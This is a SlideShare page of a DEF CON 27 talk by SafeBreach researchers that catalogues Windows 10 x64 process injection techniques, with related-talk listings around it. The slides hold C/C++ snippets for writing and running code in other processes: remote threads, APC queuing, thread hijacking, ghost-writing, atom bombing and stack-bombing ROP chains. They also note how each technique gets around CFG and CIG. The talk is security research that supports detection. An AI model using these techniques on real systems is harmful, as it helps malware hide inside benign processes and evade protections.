Skydive, real-time network analyzer, container integrationSkydive, real-time network analyzer, container integration
Skydive, real-time network analyzer, container integration
 
Skydive 5/07/2016
Skydive 5/07/2016Skydive 5/07/2016
Skydive 5/07/2016
 
TIP1 - Overview of C/C++ Debugging/Tracing/Profiling Tools
TIP1 - Overview of C/C++ Debugging/Tracing/Profiling ToolsTIP1 - Overview of C/C++ Debugging/Tracing/Profiling Tools
TIP1 - Overview of C/C++ Debugging/Tracing/Profiling Tools
 
Comprehensive XDP Off‌load-handling the Edge Cases
Comprehensive XDP Off‌load-handling the Edge CasesComprehensive XDP Off‌load-handling the Edge Cases
Comprehensive XDP Off‌load-handling the Edge Cases
 
The Simple Scheduler in Embedded System @ OSDC.TW 2014
The Simple Scheduler in Embedded System @ OSDC.TW 2014The Simple Scheduler in Embedded System @ OSDC.TW 2014
The Simple Scheduler in Embedded System @ OSDC.TW 2014
 
Open shmem
Open shmemOpen shmem
Open shmem
 
Linux kernel debugging(ODP format)
Linux kernel debugging(ODP format)Linux kernel debugging(ODP format)
Linux kernel debugging(ODP format)
 
Q2.12: Debugging with GDB
Q2.12: Debugging with GDBQ2.12: Debugging with GDB
Q2.12: Debugging with GDB
 

Similar a DEF CON 27- ITZIK KOTLER and AMIT KLEIN - gotta catch them all

DConf2015 - Using D for Development of Large Scale Primary Storage
DConf2015 - Using D for Development of Large Scale Primary StorageDConf2015 - Using D for Development of Large Scale Primary Storage
DConf2015 - Using D for Development of Large Scale Primary Storage
Liran Zvibel
 
Big Data for Mobile
Big Data for MobileBig Data for Mobile
Big Data for Mobile
BugSense
 
Virtual platform
Virtual platformVirtual platform
Virtual platform
sean chen
 
Hunting and Exploiting Bugs in Kernel Drivers - DefCamp 2012
Hunting and Exploiting Bugs in Kernel Drivers - DefCamp 2012Hunting and Exploiting Bugs in Kernel Drivers - DefCamp 2012
Hunting and Exploiting Bugs in Kernel Drivers - DefCamp 2012
DefCamp
 

Similar a DEF CON 27- ITZIK KOTLER and AMIT KLEIN - gotta catch them all (20)

introduction to node.js
introduction to node.jsintroduction to node.js
introduction to node.js
 
Beyond Breakpoints: A Tour of Dynamic Analysis
Beyond Breakpoints: A Tour of Dynamic AnalysisBeyond Breakpoints: A Tour of Dynamic Analysis
Beyond Breakpoints: A Tour of Dynamic Analysis
 
DEVIEW 2013
DEVIEW 2013DEVIEW 2013
DEVIEW 2013
 
Systems Programming Assignment Help - Processes
Systems Programming Assignment Help - ProcessesSystems Programming Assignment Help - Processes
Systems Programming Assignment Help - Processes
 
Ceph Day Melbourne - Troubleshooting Ceph
Ceph Day Melbourne - Troubleshooting Ceph Ceph Day Melbourne - Troubleshooting Ceph
Ceph Day Melbourne - Troubleshooting Ceph
 
DConf2015 - Using D for Development of Large Scale Primary Storage
DConf2015 - Using D for Development of Large Scale Primary StorageDConf2015 - Using D for Development of Large Scale Primary Storage
DConf2015 - Using D for Development of Large Scale Primary Storage
 
Week1 Electronic System-level ESL Design and SystemC Begin
Week1 Electronic System-level ESL Design and SystemC BeginWeek1 Electronic System-level ESL Design and SystemC Begin
Week1 Electronic System-level ESL Design and SystemC Begin
 
Getting started with AMD GPUs
Getting started with AMD GPUsGetting started with AMD GPUs
Getting started with AMD GPUs
 
OpenHPI - Parallel Programming Concepts - Week 3
OpenHPI - Parallel Programming Concepts - Week 3OpenHPI - Parallel Programming Concepts - Week 3
OpenHPI - Parallel Programming Concepts - Week 3
 
VMworld 2016: vSphere 6.x Host Resource Deep Dive
VMworld 2016: vSphere 6.x Host Resource Deep DiveVMworld 2016: vSphere 6.x Host Resource Deep Dive
VMworld 2016: vSphere 6.x Host Resource Deep Dive
 
StormCrawler at Bristech
StormCrawler at BristechStormCrawler at Bristech
StormCrawler at Bristech
 
Big Data for Mobile
Big Data for MobileBig Data for Mobile
Big Data for Mobile
 
A taste of GlobalISel
A taste of GlobalISelA taste of GlobalISel
A taste of GlobalISel
 
Marat-Slides
Marat-SlidesMarat-Slides
Marat-Slides
 
3
33
3
 
High Performance With Java
High Performance With JavaHigh Performance With Java
High Performance With Java
 
深入了解Redis
深入了解Redis深入了解Redis
深入了解Redis
 
Virtual platform
Virtual platformVirtual platform
Virtual platform
 
Hunting and Exploiting Bugs in Kernel Drivers - DefCamp 2012
Hunting and Exploiting Bugs in Kernel Drivers - DefCamp 2012Hunting and Exploiting Bugs in Kernel Drivers - DefCamp 2012
Hunting and Exploiting Bugs in Kernel Drivers - DefCamp 2012
 
CNIT 127 14: Protection Mechanisms
CNIT 127 14: Protection MechanismsCNIT 127 14: Protection Mechanisms
CNIT 127 14: Protection Mechanisms
 

Más de Felipe Prado

Más de Felipe Prado (20)

DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directoryDEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
 
DEF CON 24 - Bertin Bervis and James Jara - exploiting and attacking seismolo...
DEF CON 24 - Bertin Bervis and James Jara - exploiting and attacking seismolo...DEF CON 24 - Bertin Bervis and James Jara - exploiting and attacking seismolo...
DEF CON 24 - Bertin Bervis and James Jara - exploiting and attacking seismolo...
 
DEF CON 24 - Tamas Szakaly - help i got ants
DEF CON 24 - Tamas Szakaly - help i got antsDEF CON 24 - Tamas Szakaly - help i got ants
DEF CON 24 - Tamas Szakaly - help i got ants
 
DEF CON 24 - Ladar Levison - compelled decryption
DEF CON 24 - Ladar Levison - compelled decryptionDEF CON 24 - Ladar Levison - compelled decryption
DEF CON 24 - Ladar Levison - compelled decryption
 
DEF CON 24 - Clarence Chio - machine duping 101
DEF CON 24 - Clarence Chio - machine duping 101DEF CON 24 - Clarence Chio - machine duping 101
DEF CON 24 - Clarence Chio - machine duping 101
 
DEF CON 24 - Chris Rock - how to overthrow a government
DEF CON 24 - Chris Rock - how to overthrow a governmentDEF CON 24 - Chris Rock - how to overthrow a government
DEF CON 24 - Chris Rock - how to overthrow a government
 
DEF CON 24 - Fitzpatrick and Grand - 101 ways to brick your hardware
DEF CON 24 - Fitzpatrick and Grand - 101 ways to brick your hardwareDEF CON 24 - Fitzpatrick and Grand - 101 ways to brick your hardware
DEF CON 24 - Fitzpatrick and Grand - 101 ways to brick your hardware
 
DEF CON 24 - Rogan Dawes and Dominic White - universal serial aBUSe remote at...
DEF CON 24 - Rogan Dawes and Dominic White - universal serial aBUSe remote at...DEF CON 24 - Rogan Dawes and Dominic White - universal serial aBUSe remote at...
DEF CON 24 - Rogan Dawes and Dominic White - universal serial aBUSe remote at...
 
DEF CON 24 - Jay Beale and Larry Pesce - phishing without frustration
DEF CON 24 - Jay Beale and Larry Pesce - phishing without frustrationDEF CON 24 - Jay Beale and Larry Pesce - phishing without frustration
DEF CON 24 - Jay Beale and Larry Pesce - phishing without frustration
 
DEF CON 24 - Gorenc Sands - hacker machine interface
DEF CON 24 - Gorenc Sands - hacker machine interfaceDEF CON 24 - Gorenc Sands - hacker machine interface
DEF CON 24 - Gorenc Sands - hacker machine interface
 
DEF CON 24 - Allan Cecil and DwangoAC - tasbot the perfectionist
DEF CON 24 - Allan Cecil and DwangoAC - tasbot the perfectionistDEF CON 24 - Allan Cecil and DwangoAC - tasbot the perfectionist
DEF CON 24 - Allan Cecil and DwangoAC - tasbot the perfectionist
 
DEF CON 24 - Rose and Ramsey - picking bluetooth low energy locks
DEF CON 24 - Rose and Ramsey - picking bluetooth low energy locksDEF CON 24 - Rose and Ramsey - picking bluetooth low energy locks
DEF CON 24 - Rose and Ramsey - picking bluetooth low energy locks
 
DEF CON 24 - Rich Mogull - pragmatic cloud security
DEF CON 24 - Rich Mogull - pragmatic cloud securityDEF CON 24 - Rich Mogull - pragmatic cloud security
DEF CON 24 - Rich Mogull - pragmatic cloud security
 
DEF CON 24 - Grant Bugher - Bypassing captive portals
DEF CON 24 - Grant Bugher - Bypassing captive portalsDEF CON 24 - Grant Bugher - Bypassing captive portals
DEF CON 24 - Grant Bugher - Bypassing captive portals
 
DEF CON 24 - Patrick Wardle - 99 problems little snitch
DEF CON 24 - Patrick Wardle - 99 problems little snitchDEF CON 24 - Patrick Wardle - 99 problems little snitch
DEF CON 24 - Patrick Wardle - 99 problems little snitch
 
DEF CON 24 - Plore - side -channel attacks on high security electronic safe l...
DEF CON 24 - Plore - side -channel attacks on high security electronic safe l...DEF CON 24 - Plore - side -channel attacks on high security electronic safe l...
DEF CON 24 - Plore - side -channel attacks on high security electronic safe l...
 
DEF CON 24 - Six Volts and Haystack - cheap tools for hacking heavy trucks
DEF CON 24 - Six Volts and Haystack - cheap tools for hacking heavy trucksDEF CON 24 - Six Volts and Haystack - cheap tools for hacking heavy trucks
DEF CON 24 - Six Volts and Haystack - cheap tools for hacking heavy trucks
 
DEF CON 24 - Dinesh and Shetty - practical android application exploitation
DEF CON 24 - Dinesh and Shetty - practical android application exploitationDEF CON 24 - Dinesh and Shetty - practical android application exploitation
DEF CON 24 - Dinesh and Shetty - practical android application exploitation
 
DEF CON 24 - Klijnsma and Tentler - stargate pivoting through vnc
DEF CON 24 - Klijnsma and Tentler - stargate pivoting through vncDEF CON 24 - Klijnsma and Tentler - stargate pivoting through vnc
DEF CON 24 - Klijnsma and Tentler - stargate pivoting through vnc
 
DEF CON 24 - Antonio Joseph - fuzzing android devices
DEF CON 24 - Antonio Joseph - fuzzing android devicesDEF CON 24 - Antonio Joseph - fuzzing android devices
DEF CON 24 - Antonio Joseph - fuzzing android devices
 

Último

Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Victor Rentea
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
UiPathCommunity
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 

Último (20)

Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
 
Corporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxCorporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptx
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
 
Introduction to use of FHIR Documents in ABDM
Introduction to use of FHIR Documents in ABDMIntroduction to use of FHIR Documents in ABDM
Introduction to use of FHIR Documents in ABDM
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf
 
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
 
AI in Action: Real World Use Cases by Anitaraj
AI in Action: Real World Use Cases by AnitarajAI in Action: Real World Use Cases by Anitaraj
AI in Action: Real World Use Cases by Anitaraj
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
Six Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal OntologySix Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal Ontology
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Exploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusExploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with Milvus
 
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot ModelMcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
 
Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..
 

DEF CON 27- ITZIK KOTLER and AMIT KLEIN - gotta catch them all

  • 1. Process Injection Techniques - Gotta Catch Them All Amit Klein, VP Security Research Itzik Kotler, CTO and co-founder Safebreach Labs
  • 2. About Itzik Kotler • 15+ years in InfoSec • CTO & Co-Founder of SafeBreach • Presented in Black Hat, DEF CON, HITB, RSA, CCC and more. • http://www.ikotler.org
  • 3. About Amit Klein • 28 years in InfoSec • VP Security Research Safebreach (2015-Present) • 30+ Papers, dozens of advisories against high profile products • Presented in BlackHat, DefCon, HITB, NDSS, InfoCom, DSN, RSA, CertConf, Bluehat, OWASP Global, OWASP EU, AusCERT and more • http://www.securitygalore.com
  • 4. Why this research? • No comprehensive collection/catalog of process injection techniques • No separation of true injections from process hollowing/spawning • No categorization (allocation vs. memory write vs. execution), analysis, comparison • Update for Windows 10 (latest versions), x64
  • 5. Kudos and hat-tip • Kudos to the following individuals/companies, for inventing/developing/documenting/POCing many techniques: • Adam of Hexacorn • Odzhan • EnSilo • Csaba Fitzl AKA TheEvilBit • And many others… • Hat tip to EndGame for providing the first compilation of injection techniques.
  • 6. True process injection • True process injection – from live userspace process (malware) to live userspace process (target, benign) • In contrast to (out of scope): • Process spawning and hollowing – spawning the “target” process and injecting into it (especially before execution) • Pre-execution – e.g. DLL hijacking, AppCert, AppInit, LSP providers, Image File Execution Options, etc.
  • 7. Windows 10, x64 • Windows 10 • CFG (Control Flow Guard) – prevent indirect calls to non-approved addresses • CIG (Code Integrity Guard) - only allow modules signed by Microsoft/Microsoft Store/WHQL to be loaded into the process memory • x64 (vs. x86) • Calling convention – first 4 arguments in (volatile) registers: RCX, RDX, R8, R9. Invoking functions (from ROP) necessitates control over some/all these registers. • No POPA - writing ROP is more difficult (bootstrapping registers)
  • 8. The enemy of a good PoC… HANDLE th = OpenThread(THREAD_SET_CONTEXT| THREAD_QUERY_INFORMATION, FALSE, thread_id); ATOM a = GlobalAddAtomA(payload); NtQueueApcThread(th, GlobalGetAtomNameA, (PVOID)a, (PVOID)(target_payload), (PVOID)(sizeof(payload)));
  • 9. The scope • True process injection • Running “sequence” of logic/commands in the target process (not just spawning cmd.exe…) • Windows 10 version 1803 and above • x64 injecting process, x64 target process, both medium integrity • Non-admin • Evaluation against Windows 10 protections (CFG, CIG)
  • 10. CFG strategy • Disable CFG • Standard Windows API SetProcessValidCallTargets() can be used to deactivate CFG in the target process (remotely!) • Suspicious… • May be disabled/restricted in the future • Allocate/set executable memory (+making all the allocation CFG- valid) • VirtualAllocEx/VirtualProtectEx • Suspicious… • Playing by the rules – writing non-executable data (ROP chain), and using a CFG-agnostic execution method to run a stack pivot gadget (or similar) • Difficult…
  • 11. Other defenses • Used to be eliminated from the target process using SetProcessMitigationPolicy • 3 argument function, can be invoked remotely via NtQueueApcThread • No longer works (1809). • CIG is most painful (no loading of arbitrary DLLs)
  • 12. Typical process injection building blocks • Memory allocation • May be implicit (cave, stack, …) • Page permission issues • Control over allocation address? • CFG validity? • Memory writing • Restricted size/charset? • Atomic? • Execution • Target has to be CFG-valid? • Control over registers? • Limitations/pre-requisites
  • 14. Classic memory allocation technique HANDLE h = OpenProcess(PROCESS_VM_OPERATION, FALSE, process_id); LPVOID target_payload=VirtualAllocEx(h,NULL,sizeof(payload), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); • Can allocate executable pages • For executable pages, Windows automatically sets all the region to be CFG-valid • Variant – allocating RW pages, then adding X with VirtualProtectEx
  • 15. The classic WriteProcessMemory memory writing technique HANDLE h = OpenProcess(PROCESS_VM_WRITE, FALSE, process_id); WriteProcessMemory(h, target_payload, payload, sizeof(payload), NULL); • No prerequisites, no limitations. Address is controlled. • CFG – if the allocation set execution privileges (e.g. VirtualAllocEx), then all the region is CFG-valid. • CIG – no impact.
  • 16. The classic CreateRemoteThread execution technique HANDLE h = OpenProcess(PROCESS_CREATE_THREAD, FALSE, process_id); CreateRemoteThread(h, NULL, 0, (LPTHREAD_START_ROUTINE) target_execution, RCX, 0, NULL); • Pre-requisites – none. • CIG – no impact • CFG – target_execution should be valid CFG target. • Registers – control over RCX
  • 17. A classic DLL injection execution technique HANDLE h = OpenProcess(PROCESS_CREATE_THREAD, FALSE, process_id); CreateRemoteThread(h, NULL, 0, (LPTHREAD_START_ROUTINE)LoadLibraryA, target_DLL_path, 0, NULL); • Pre-requisites – the DLL is on disk; write-technique used to write the DLL path to the target process; DllMain is restricted (loader lock). • CFG – no impact • CIG – blocks this technique • Variant: using QueueUserAPC/NtQueueApcThread
  • 18. Another classic DLL injection execution technique HMODULE h = LoadLibraryA(dll_path); HOOKPROC f = (HOOKPROC)GetProcAddress(h, "GetMsgProc"); // GetMessage hook SetWindowsHookExA(WH_GETMESSAGE, f, h, thread_id); PostThreadMessage(thread_id, WM_NULL, NULL, NULL); // trigger the hook • Pre-requisites – the DLL is on disk, exports e.g. GetMsgProc • CFG – no impact • CIG – blocks this technique
  • 19. The classic APC execution technique HANDLE h = OpenThread(THREAD_SET_CONTEXT, FALSE, thread_id); QueueUserAPC((LPTHREAD_START_ROUTINE)target_execution, h, RCX); or NtQueueApcThread(h, (LPTHREAD_START_ROUTINE)target_execution, RCX, RDX, R8D); • Pre-requisites – thread must be in alertable state (next slide) • CIG – no impact • CFG – target_execution should be valid CFG target. • Registers – control over RCX (NtQueueApcThread – RCX, RDX, R8D)
  • 20. Alertable state functions The following 5 functions (and their low-level syscall wrappers): • SleepEx • NtDelayExecution • WaitForSingleObjectEx • NtWaitForSingleObject • WaitForMultipleObjectsEx • NtWaitForMultipleObjects • SignalObjectAndWait • NtSignalAndWaitForSingleObject • MsgWaitForMultipleObjectsEx (probably RealMsgWaitForMultipleObjectsEx) • NtUserMsgWaitForMultipleObjectsEx Quite common! Easily detected – RIP at internal function +0x14 (right after SYSCALL)
  • 21. The classic thread hijacking execution technique (SIR) HANDLE t = OpenThread(THREAD_SET_CONTEXT, FALSE, thread_id); SuspendThread(t); CONTEXT ctx; ctx.ContextFlags = CONTEXT_CONTROL; ctx.Rip = (DWORD64)target_execution; SetThreadContext(t, &ctx); ResumeThread(t);
  • 22. SIR continued • Pre-requisites: none. • CFG – no impact (!) except RSP • Control over registers: no guaranteed control over volatile registers (RAX, RCX, RDX, R8-R11). Control over RSP is limited (stack reservation limits). • With RW memory (no X): • Use write primitive to write ROP chain to the target process • Set RIP to a stack pivot gadget to set RSP to the controlled memory
  • 23. Ghost-writing (monolithic technique) • Like thread hijacking, but without the memory writing part… • Memory writing is achieved in steps, using SetThreadContext to set registers • At the end of each step, the thread is running an infinite loop (success marker) • Required ROP gadgets: • Sink gadget – infinite loop (JMP -2), marking the successful end of execution • Write gadget – e.g. MOV [RDI],RBX; …; RET • Stack pivot or equivalent • Step 1: use the write gadget to write the loop gadget into stack RDI=ctx.rsp, RBX=sink_gadget, RIP=write_gadget • Step 2: use the write gadget to write arbitrary memory (infinite loop after each QWORD): RDI=address, RBX=data, RSP=ctx.rsp-8, RIP=write_gadget • Step 3: execute stack pivot (or equivalent): RSP=new_stack, RIP=rop_gadget
  • 24. Unused stack as memory - tips • Maintain distance from the official TOS (leave room for WinAPI call stack) • Don’t go too far – stack is limited (1MB) • Grow (commit) the stack by touching memory at page size (4KB) intervals • Mind the alignment (16B) when invoking functions
  • 25. Ghost-writing (contd.) • Pre-requisites: writable memory • CFG: no impact (!) except RSP • CIG: no impact • Control over registers (step 3): no guaranteed control over volatile registers (RAX, RCX, RDX, R8-R11). Control over RSP is limited (stack reservation limits).
  • 26. Shared memory writing technique HANDLE hm = OpenFileMapping(FILE_MAP_ALL_ACCESS,FALSE,section_name); BYTE* buf = (BYTE*)MapViewOfFile(hm, FILE_MAP_ALL_ACCESS, 0, 0, section_size); memcpy(buf+section_size-sizeof(payload), payload, sizeof(payload)); HANDLE h = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, process_id); char* read_buf = new char[sizeof(payload)]; SIZE_T region_size; for (DWORD64 address = 0; address < 0x00007fffffff0000ull; address += region_size) { MEMORY_BASIC_INFORMATION mem; SIZE_T buffer_size = VirtualQueryEx(h, (LPCVOID)address, &mem, sizeof(mem)); … Shared memory detection logic here … region_size = mem.RegionSize;
  • 27. Shared memory detection logic if ((mem.Type == MEM_MAPPED) && (mem.State == MEM_COMMIT) && (mem.Protect == PAGE_READWRITE) && (mem.RegionSize == section_size)) { ReadProcessMemory(h, (LPCVOID)(address+section_size-sizeof(payload)), read_buf, sizeof(payload), NULL); if (memcmp(read_buf, payload, sizeof(payload)) == 0) { // the payload is at address + section_size - sizeof(payload); … break; } }
  • 28. (contd.) • Pre-requisites: target process has RW shared memory, attacker knows the name and size • CFG – (shared) memory retains its access rights (typically not executable) • CIG – no impact
  • 29. Atom bombing write technique Naïve code (payload length<256, with terminating NUL byte and no other NULs): HANDLE th = OpenThread(THREAD_SET_CONTEXT| THREAD_QUERY_INFORMATION, FALSE, thread_id); ATOM a = GlobalAddAtomA(payload); NtQueueApcThread(th, GlobalGetAtomNameA, (PVOID)a, (PVOID)(target_payload), (PVOID)(sizeof(payload))); • Original paper doesn’t write NUL bytes (assumes zeroed out target memory) – we devised a technique to write NUL bytes • Pre-requisites: thread must be in alertable state. target_payload is allocated, writable. • CFG/CIG – no impact. target_payload retains its access rights (typically not executable)
  • 30. NtMapViewOfSection (allocating+) writing technique HANDLE fm = CreateFileMappingA(INVALID_HANDLE_VALUE, NULL, PAGE_EXECUTE_READWRITE, 0, sizeof(payload), NULL); LPVOID map_addr =MapViewOfFile(fm, FILE_MAP_ALL_ACCESS, 0, 0, 0); HANDLE p = OpenProcess(PROCESS_VM_WRITE | PROCESS_VM_OPERATION, FALSE, process_id); memcpy(map_addr, payload, sizeof(payload)); LPVOID target_payload=0; SIZE_T view_size=0; NtMapViewOfSection(fm, p, &target_payload, 0, sizeof(payload), NULL, &view_size, ViewUnmap, 0, PAGE_EXECUTE_READWRITE );
  • 31. (contd.) • Cannot be used for already allocated memory. If target_payload is 0, Windows chooses the address; if target_payload>0, Windows will map to there (but it has to be an un-allocated memory). • Pre-requisites: none. Limitations: cannot write to allocated memory. • CFG – memory allocated with page execution privileges becomes valid CFG target! • CIG – not relevant
  • 32. Unmap+rerwrite execution technique MODULEINFO ntdll_info; HMODULE ntdll = GetModuleHandleA("ntdll"); GetModuleInformation(GetCurrentProcess(), ntdll, &ntdll_info, sizeof(ntdll_info)); LPVOID ntdll_copy = malloc(ntdll_info.SizeOfImage); HANDLE p = OpenProcess(PROCESS_VM_WRITE | PROCESS_VM_READ | PROCESS_VM_OPERATION | PROCESS_SUSPEND_RESUME, FALSE, process_id); NtSuspendProcess(p); ReadProcessMemory(p, ntdll, ntdll_copy, ntdll_info.SizeOfImage, NULL); … // Patch e.g. NtClose in ntdll_copy NtUnmapViewOfSection(p, ntdll); … // Allocate +(Re)write ntdll_copy to address ntdll in target process FlushInstructionCache(p, ntdll, ntdll_info.SizeOfImage); NtResumeProcess(p);
  • 33. (contd.) • Pre-requisite: Write technique must be able to allocate (at least) RX pages in a specific address • CFG – all the original CFG-valid addresses in NTDLL should be CFG-valid (or else process may crash). However, both VirtualAllocEx and NtMapViewOfSection set whole section to CFG-valid when PAGE_EXECUTE is requested. • CIG – not relevant • Control over registers: no • Note that in order not to destabilize the process: • Process-wide suspend • Copying the complete NTDLL memory (incl. static variables)
  • 34. Callback override execution techniques • SetWindowLongPtr (SetWindowLong) • PROPagate • Kernel Callback Table • Ctrl-Inject • Service Control • USERDATA • ALPC callback • CLIBRDWNDCLASS • DnsQuery • WNF callback • Shatter-like: • WordWarping • Hyphentension • AutoCourgette • Streamception • Oleum • ListPLanting • Treepoline
  • 35. Concept • Write code to the target process using a writing technique • Find/obtain a memory address of an object (with vtbl)/callback function • May be tricky – need to know that the process has the object/callback (e.g. ALPC, console apps, private clipboard) • Via API (e.g. GetWindowLongPtr) • Via memory search (e.g. ALPC) • Replace the object/callback (using a writing technique or standard API) to point at a chosen function/code • Must be CFG-valid target • May require some object/code adjustments • Trigger execution • May be tricky (e.g. DnsQuery) • (Restore original object/callback)
  • 36. CtrlInject execution technique HANDLE h = OpenProcess(PROCESS_VM_OPERATION, FALSE, process_id); // PROCESS_VM_OPERATION is required for RtlEncodeRemotePointer void* encoded_addr = NULL; ntdll!RtlEncodeRemotePointer(h, target_execution, &encoded_addr); … // Use any Memory Write technique here to copy encoded_addr to kernelbase!SingleHandler in the target process INPUT ip; ip.type = INPUT_KEYBOARD; ip.ki.wScan = 0; ip.ki.time = 0; ip.ki.dwExtraInfo = 0; ip.ki.wVk = VK_CONTROL; ip.ki.dwFlags = 0; // 0 for key press SendInput(1, &ip, sizeof(INPUT)); Sleep(100); PostMessageA(hWindow, WM_KEYDOWN, 'C', 0); // hWindow is a handle to the application window
  • 37. memset/memmove write technique HMODULE ntdll = GetModuleHandleA("ntdll"); HANDLE t = OpenThread(THREAD_SET_CONTEXT, FALSE, thread_id); for (int i = 0; i < sizeof(payload); i++) { NtQueueApcThread(t, GetProcAddress(ntdll, "memset"), (void*)(target_payload+i), (void*)*(((BYTE*)payload)+i), 1); } // Can finish with an “atomic” NtQueueApcThread(t, GetProcAddress(ntdll, "memmove"), (void*)target_payload_final, (void*)target_payload, sizeof(payload));
  • 38. (contd.) • Prerequisites: thread must be in an alertable state, memory is allocated. • CFG: not affected (ntdll!memset is CFG-valid), memory retains its original access rights (typically RW) • CIG: not affected. • Writes to any address
  • 39. Stack-bombing execution technique Naïve code (run and crash): HANDLE t = OpenThread(THREAD_SET_CONTEXT | THREAD_GET_CONTEXT | THREAD_SUSPEND_RESUME, FALSE, thread_id); SuspendThread(t); CONTEXT ctx; ctx.ContextFlags = CONTEXT_ALL; GetThreadContext(t, &ctx); DWORD64 ROP_chain = (DWORD64)ctx.Rsp; // for the 5 alertable state functions… … // Adjust ROP_chain based on ctx.rip (or use APC…) … // write ROP chain to ROP_chain memory address in target process ResumeThread(t); // when the current function returns, it’ll execute the ROP chain
  • 40. Alertable state internal functions mov r10,rcx mov eax,SERVICE_DESCRIPTOR test byte ptr [SharedUserData+0x308],1 jne +3 syscall ret int 2E ret • No use of stack (tos=rsp=ptr to return address) • No use of volatile registers after return from kernel – injected code can use them
  • 41. Analysis • Prerequisites: thread in alertable state (APC), or careful analysis of interrupted function; target (e.g. ROP gadget) should be RX. • CFG – no impact(!). Can use ROP chain. • CIG – no impact. • Control over registers: not volatile ones. Paper+Pinjectra has fully functional code (based on APC+memset)
  • 42. From the FAIL Department • SetWinEventHook (DLL injection execution technique) • No DLL injection (Windows 10 v1903). All events are “out-of-context” • When did it last work? • Desktop Heap (write technique) • Implementation changed (in Windows 10?), desktop heap no longer shared among processes. If you manage to run any of these on Windows 10 x64 version 1903, please let us know!
